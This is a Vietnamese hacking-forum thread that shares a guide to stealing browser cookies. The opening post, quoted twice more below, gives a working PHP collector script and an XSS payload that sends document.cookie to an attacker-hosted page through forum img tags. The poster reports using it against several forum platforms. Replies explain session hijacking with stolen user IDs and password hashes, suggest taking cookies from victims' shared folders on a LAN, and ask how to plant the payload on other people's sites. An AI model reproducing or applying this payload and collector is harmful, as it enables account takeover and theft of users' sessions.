banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Hướng dẫn lấy cookie(sưu tầm )  XML
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 07:14:14 (+0700) | #1 | 3976
[Avatar]
legendayhacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 06:00:41
Messages: 32
Location: legend
Offline
[Profile] [PM]
Tác giả : W_Hat (Z0rr0)
Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi

dùng ðể lấy cookies :

Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào

ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi

file docs.php, save thành file text với tên file là hacked.txt :
Trích dẫn:
//Begin of docs.php

<?php

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>");

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$ key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

}

// get current date

$now = date("Y-m-d H : i : s ");

// init

$myData = "[-----$now-----]" . LINE;

// get

$myData .= getvars($HTTP_GET_VARS, "");

// file

$file = "hacked.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

//end of docs.php


Còn ðây là ðoạn script dùng ðể lấy cookies::

document.write('<img src=http://địa chỉ website/docs.php?docs='+escape

(document.cookie)+'>')



Ví dụ : khi áp dụng trong tag img, ta dùng như sau:

[img]java script: Document.write('<img src=http://địa chỉ website/docs.php?

docs='+escape(document.cookie)+'>')[/img]

hoặc:

[img]java script: Document.write('<img src=http:// địa chỉ

website/docs.php?docs='+escape(document.cookie)+'>')[/img]

Các này tôi từng áp dụng rất thành công trên nhiều forum ikonboard, UBB,

VBB, Snitz (tất nhiên là nếu chưa fixed )...
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 07:28:42 (+0700) | #2 | 3988
[Avatar]
KINYO
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline
[Profile] [PM] [WWW]
Thế lấy cookies về để làm gì hả bạn ?
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 08:58:25 (+0700) | #3 | 4010
[Avatar]
lihavim
Elite Member

[Minus]    0    [Plus]
Joined: 08/06/2004 15:19:32
Messages: 506
Offline
[Profile] [PM]

KINYO wrote:
Thế lấy cookies về để làm gì hả bạn ? 

Định nghĩa về cookie
http://www.answers.com/topic/cookie-technology 


Thân.
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 09:59:26 (+0700) | #4 | 4028
[Avatar]
KINYO
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline
[Profile] [PM] [WWW]

lihavim wrote:

KINYO wrote:
Thế lấy cookies về để làm gì hả bạn ? 

Định nghĩa về cookie
http://www.answers.com/topic/cookie-technology 


Thân. 


Hi hi cám ơn bạn, nhưng tôi muốn hỏi bạn gì ở trên là bạn ý lấy cookies về rồi làm gì cơ smilie
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 10:24:01 (+0700) | #5 | 4035
[Avatar]
micr0vnn
Member

[Minus]    0    [Plus]
Joined: 29/06/2006 15:52:34
Messages: 67
Offline
[Profile] [PM]
Lấy hút ki là gì chài ......... smilie
Mấy sư huynh chỉ em zúi em không biết làn gì hết smilie

SƯ huynh nào biét hack chỉ em....... không biết hack thui khỏi chỉ smilie
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 13:06:01 (+0700) | #6 | 4078
[Avatar]
thuanld
Member

[Minus]    0    [Plus]
Joined: 26/04/2005 14:29:07
Messages: 10
Offline
[Profile] [PM]
Lôi cái đó về chắc có ý định Fake Cookies quá.... :d
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 19:13:50 (+0700) | #7 | 4109
[Avatar]
legendayhacker
Member

[Minus]    0    [Plus]
Joined: 27/06/2006 06:00:41
Messages: 32
Location: legend
Offline
[Profile] [PM]
--------------------------------------------------------------------------------

Hack dùng Cookie :

1. Giới thiệu về cookie
cookie là những phần dữ liệu nhỏ có cấu trú được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site. Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...
cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site; cũng có nhiều site sử dụng những thông tin cá nhân của người dùng để phục vụ cho các mục đích khác như quảng cáo, hoặc thậm chí bán thông tin của người dùng cho khách hàng khác (vd: nếu đột nhiên bạn nhận vài email quảng cáo mỗi ngày được gửi vào mail box của bạn mà ko biết tại sao, thì có thể là thông tin cá nhân của bạn đã bị một site nào đó mà bạn từng xem sử dụng)
2. Các thành phần của cookie
Tên: do người lập trình web site chọn
Domain: là tên miền từ server mà cooki e được tạo và gửi đi
Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
Ngày hết hạn: là thời điểm mà cookie hết hiệu lực\
Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

cookies của Netscape (NS) đặt trong file cooki s.txt, trong thư mục cài đặt NS \Users\default (hoặc \User\Yourname), còn của IE thường đặt trong \Documents and Settings\Username\cookies\username@sitename.txt. (đối với win9x, thư mục cookies nằm trong thư mục Windows/cookies)

Netscape là trình duyệt đầu tiên sử dụng cookie, kế đến là IE của microsoft.
Các thông tin khác về cookie thêm về cookie, các bạn có thể tham khảo thêm ở http://www.cooki_ecentral.com/ (bỏ gạch dưới ở giữa)

3. Khai thác cookie
Ưu điểm của việc sử dụng cookie đã rõ ràng, việc lưu trữ và dùng lại các thông tin đăng nhập sẽ giúp người dùng tiết kiệm thời gian trong việc duyệt các web site. Tuy nhiên, bên cạnh những lợi ích của nó. cookie là một trong những nguyên nhân gây tiết lộ thông tin riêng tư của người dùng. Những người biết tận dụng những thông tin này có thể gây nên những hậu quả nghiêm trọng. VD: một hacker làm việc ở một ngân hàng có thể tìm cách xem thông tin trong cookie của khách hàng và sử dụng thông tin này để truy cập vào acc của khách hàng đó. Hoặc hacker có thể tìm cách trộm cookie của admin 1 website và từ đó có thể dễ dàng chiếm được quyền điều khiển site.
Những browser hiện nay cho phép người dùng khóa cookie hoặc hỏi họ trước khi lưu lại cookie trên hệ thống. Cũng có nhiều software giúp người dùng quản lý tốt cookie, giúp ngăn chặn hoặc cảnh báo những nguy cơ có thể gây hại.

Tác giả: W_Hat (Z0rr0)
---------------------------------------------


--------------------------------------------------------------------------------
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 19:54:01 (+0700) | #8 | 4113
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Cái này hình như là XSS thì phải. Khi hack theo cách trên thì nếu thằng admin mà lướt qua tấm hình thì ta sẽ có đc cookie của nó => đổi cookie của mình thành của nó = cách fake hoặc nếu rảnh hơn thì có thể crack passhash. smilie
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 05/07/2006 23:18:01 (+0700) | #9 | 4163
[Avatar]
Z0rr0
Q+WRtaW5pc3RyYXRvc+g

Joined: 14/08/2002 12:52:01
Messages: 1323
Location: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 bài bạn legendayhacker là của tôi cách đây gần 4 năm. Lúc còn ngồi nghịch inject script vào mấy cái tag img của ikonboard cùng lão Jal smilie
Hibernating
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 06/07/2006 02:05:29 (+0700) | #10 | 4218
[Avatar]
chupichu
Elite Member

[Minus]    0    [Plus]
Joined: 16/07/2004 14:17:57
Messages: 229
Location: Lầu Xanh
Offline
[Profile] [PM] [Yahoo!]
Đó là qua bug, mình hướng dẫn qua Local Area Network ^^
Đơn giản vào My Network, tìm máy của victim, nếu nó share dữ liệu thì vào Temporary Internet Files rồi đá cúc cu của nó smilie)
Where Have You Gone..
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 20/08/2006 03:22:13 (+0700) | #11 | 16297
Dellangel
Member

[Minus]    0    [Plus]
Joined: 22/07/2006 15:54:56
Messages: 4
Offline
[Profile] [PM]
[img]java script: Document.write('<img src=http://địa chỉ website/docs.php?

docs='+escape(document.cookie)+'>')[/img]

hoặc:

[img]java script: Document.write('<img src=http:// địa chỉ

website/docs.php?docs='+escape(document.cookie)+'>')[/img]


Có thể cho tôi hỏi, sao mình chèn đoạn code này vào được site của người khác ? Nếu là site của mình thì dễ rồi. Sao mình save được khi site là của người khác.
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 22/08/2006 07:05:20 (+0700) | #12 | 16823
yakata
Member

[Minus]    0    [Plus]
Joined: 09/08/2006 11:28:30
Messages: 9
Offline
[Profile] [PM]
Các này tôi từng áp dụng rất thành công trên nhiều forum ikonboard, UBB,

VBB, Snitz (tất nhiên là nếu chưa fixed )...  

nếu forum đã fired thì làm như thế nào hả huynh?
còn cách nào khác không vậy?
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 27/08/2006 14:57:22 (+0700) | #13 | 18399
[Avatar]
cnxgroup
Member

[Minus]    0    [Plus]
Joined: 27/08/2006 01:54:28
Messages: 2
Offline
[Profile] [PM]
Các bác cho tôi hỏi là làm sao biết mật khẩu của mình trong cookie vây? cho dù tôi vào cookie của máy mình cũng chẳng thể nào hiểu được????
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 27/08/2006 17:26:40 (+0700) | #14 | 18428
Mr.Khoai
Moderator

Joined: 27/06/2006 01:55:07
Messages: 954
Offline
[Profile] [PM]

cnxgroup wrote:
Các bác cho tôi hỏi là làm sao biết mật khẩu của mình trong cookie vây? cho dù tôi vào cookie của máy mình cũng chẳng thể nào hiểu được???? 


password của bạn không được lưu trong cookies mà đó chỉ là passhash. Passhash là password đã được qua một hàm hash. Các hàm hash (băm thì phải, cái này tiếng Việt Khoai không biết) là các hàm 1 chiều từ input-->output mà không để đi ngược lại. vd nếu Khoai có password 123456 thì sau khi qua hàm md5 hash sẽ ra cái này:
Code:
e10adc3949ba59abbe56e057f20f883e

Trong cookies có lưu lại user_id và passhash. Nếu bạn phân biệt được đoạn nào là uid, đoạn nào là passhash, và trong tay bạn có uid và passhash của một user khác, bạn có thể thay thế uid/passhash của mình bằng của người đó. Đó là nguyên lý làm việc của fake cookies.
Khoai
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 02/09/2006 12:31:36 (+0700) | #15 | 20109
[Avatar]
Luke
Elite Member

[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
Có thể update câu lệnh ăn cắp cookie bằng một kỹ thuật khéo hơn là tạo ra một obj rồi appendchild
Và dùng trình duyệt opera để replace cookie là tốt nhất
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 28/10/2007 12:40:43 (+0700) | #16 | 93490
[Avatar]
hackerctm
Member

[Minus]    0    [Plus]
Joined: 20/03/2007 07:21:33
Messages: 35
Offline
[Profile] [PM]
cho hỏi
nếu ta save cái đoạn mã đó và up lên 1 forum nào đó của 1 wedsite thì ta có thề âm thầm mà theo dõi admin wedsite đăng nhập với ID vs Pass
câu hỏi là ơ đây
ví dụ tôi hiện đang có 1 trang wed www.forum.xxx.xxx vậy khi ta chèn cái đoạn mã đó vào phần post bài
đúng không hay là khi ta post bài rồi chèn cái đoạn mã đó vào thì liệu cái đoạn mã có xuất hiện cùng với nội dung mình post bài smilie
có gì xin chỉ giáo smilie
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 28/10/2007 19:42:22 (+0700) | #17 | 93519
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

hackerctm wrote:
cho hỏi
nếu ta save cái đoạn mã đó và up lên 1 forum nào đó của 1 wedsite thì ta có thề âm thầm mà theo dõi admin wedsite đăng nhập với ID vs Pass
câu hỏi là ơ đây
ví dụ tôi hiện đang có 1 trang wed www.forum.xxx.xxx vậy khi ta chèn cái đoạn mã đó vào phần post bài
đúng không hay là khi ta post bài rồi chèn cái đoạn mã đó vào thì liệu cái đoạn mã có xuất hiện cùng với nội dung mình post bài smilie
có gì xin chỉ giáo smilie 


web hay wed?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 29/10/2007 02:32:03 (+0700) | #18 | 93570
[Avatar]
hackerctm
Member

[Minus]    0    [Plus]
Joined: 20/03/2007 07:21:33
Messages: 35
Offline
[Profile] [PM]

conmale wrote:

web hay wed? 

sr vì đánh nhanh quá nên không để ý chữ
có gì bỏ qua cho
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 22/11/2007 06:15:56 (+0700) | #19 | 99202
[Avatar]
Free Life
Member

[Minus]    0    [Plus]
Joined: 21/11/2007 16:46:02
Messages: 9
Location: Tội Lỗi
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
cách này có thể khai thác cookie của thèng vbb được ko vậy
[Up] [Print Copy]
  [Question]   Re: Hướng dẫn lấy cookie(sưu tầm ) 22/11/2007 06:39:38 (+0700) | #20 | 99210
[Avatar]
Ikut3
Elite Member

[Minus]    0    [Plus]
Joined: 24/09/2007 23:47:03
Messages: 1429
Location: Nhà hát lớn
Offline
[Profile] [PM] [Yahoo!]

Free Life wrote:
cách này có thể khai thác cookie của thèng vbb được ko vậy  


legendayhacker wrote:

Các này tôi từng áp dụng rất thành công trên nhiều forum ikonboard, UBB,

VBB, Snitz (tất nhiên là nếu chưa fixed )...  


Hông đọc kĩ rồi
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 15/11/2012 14:43:17 (+0700) | #21 | 271019
tientung_vt
Member

[Minus]    0    [Plus]
Joined: 30/10/2012 20:57:47
Messages: 8
Offline
[Profile] [PM]
anh legendayhacker ơi sao e làm theo hướng dẫn vậy mà e chỉ thu đuọc cái dòng nè trong file .txt nhỉ?:
[-----2012-11-15 15 : 41 : 01 -----]
[-----2012-11-15 15 : 41 : 03 -----]
[-----2012-11-15 15 : 41 : 03 -----]
cái nè chỉ là ngày giờ nó gửi chứ hém có cookiesmilie smilie smilie smilie smilie
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 15/11/2012 17:42:55 (+0700) | #22 | 271028
vina_man
Member

[Minus]    0    [Plus]
Joined: 09/06/2011 05:35:02
Messages: 14
Offline
[Profile] [PM]

legendayhacker wrote:
Tác giả : W_Hat (Z0rr0)
Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi
dùng ðể lấy cookies :
Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào
ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi
file docs.php, save thành file text với tên file là hacked.txt :
Trích dẫn:
//Begin of docs.php
<?php
define ("LINE", "\r\n"smilie;
define ("HTML_LINE", "<br>"smilie;
function getvars($arr, $title)
{
$res = "";
$len = count($arr);
if ($len>0)
{
if (strlen($title)>0)
{
print("[--------$title--------]" . HTML_LINE);
$res .= "[--------$title--------]" . LINE;
}
foreach ($arr as $key => $value)
{
print("[$key]" . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= "[$ key]" . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date("Y-m-d H : i : s "smilie;
// init
$myData = "[-----$now-----]" . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, ""smilie;
// file
$file = "hacked.txt";
$mode = "r+";
if (!file_exists($file))
$mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>

 


Cái này cũng hay mặc dù code hơi khó nhìn chút xíu , hj cám ơn chia xẻ . smilie
http://youtu.be/YltzHTN4sAs
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 21/11/2012 10:48:57 (+0700) | #23 | 271183
Zombie
HVA Friend

Joined: 13/12/2002 03:27:34
Messages: 77
Offline
[Profile] [PM]
Thế anh cho em hỏi.... làm sao upload file đó lên server ah ?
Em thử hoài mà không biết làm sao ?
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 22/11/2012 08:06:32 (+0700) | #24 | 271203
tientung_vt
Member

[Minus]    0    [Plus]
Joined: 30/10/2012 20:57:47
Messages: 8
Offline
[Profile] [PM]
anh ơi cho e hỏi chút thế nhúng vào link web rùi gửi cho admin nó lick sao e toàn thu được mỗi cái trường time trong file hacker.txt thế ạ?
e là new có gì mong anh chỉ giáo
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 22/11/2012 16:23:28 (+0700) | #25 | 271223
tientung_vt
Member

[Minus]    0    [Plus]
Joined: 30/10/2012 20:57:47
Messages: 8
Offline
[Profile] [PM]

legendayhacker wrote:
Tác giả : W_Hat (Z0rr0)
Tôi sẽ hướng dẫn cho các bạn một vài source code ðơn giản trước ðây tôi

dùng ðể lấy cookies :

Các bạn save ðoạn code sau thành file docs.php, sau ðó upload lên 1 host nào

ðó support php. Mục ðích của ðoạn code này là sẽ ðọc data truyền vào khi gọi

file docs.php, save thành file text với tên file là hacked.txt :
Trích dẫn:
//Begin of docs.php

<?php

define ("LINE", "\r\n"smilie;

define ("HTML_LINE", "<br>"smilie;

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$ key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

}

// get current date

$now = date("Y-m-d H : i : s "smilie;

// init

$myData = "[-----$now-----]" . LINE;

// get

$myData .= getvars($HTTP_GET_VARS, ""smilie;

// file

$file = "hacked.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

//end of docs.php


Còn ðây là ðoạn script dùng ðể lấy cookies::

document.write('<img src=http://địa chỉ website/docs.php?docs='+escape

(document.cookie)+'>')



Ví dụ : khi áp dụng trong tag img, ta dùng như sau:

[img]java script: Document.write('<img src=http://địa chỉ website/docs.php?

docs='+escape(document.cookie)+'>')[/img]

hoặc:

[img]java script: Document.write('<img src=http:// địa chỉ

website/docs.php?docs='+escape(document.cookie)+'>')[/img]

Các này tôi từng áp dụng rất thành công trên nhiều forum ikonboard, UBB,

VBB, Snitz (tất nhiên là nếu chưa fixed )...
 


Em làm theo anh sao kết quả e thu được nó lại thế này nhỉ? có gì anh chỉ giáo e chút với. thanks anh!
[$ key]
\' escape(document.cookie)
[-----2012-11-22 17 : 20 : 59 -----]
[$ key]
\' escape(document.cookie)
[-----2012-11-22 17 : 20 : 59 -----]
[$ key]
\' escape(document.cookie)
[Up] [Print Copy]
  [Question]   Hướng dẫn lấy cookie(sưu tầm ) 26/11/2012 13:13:26 (+0700) | #26 | 271319
novadq
Member

[Minus]    0    [Plus]
Joined: 13/06/2011 02:54:16
Messages: 9
Offline
[Profile] [PM]
Với các tham số được thiết lập là httpOnly thì sao ??? smilie)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|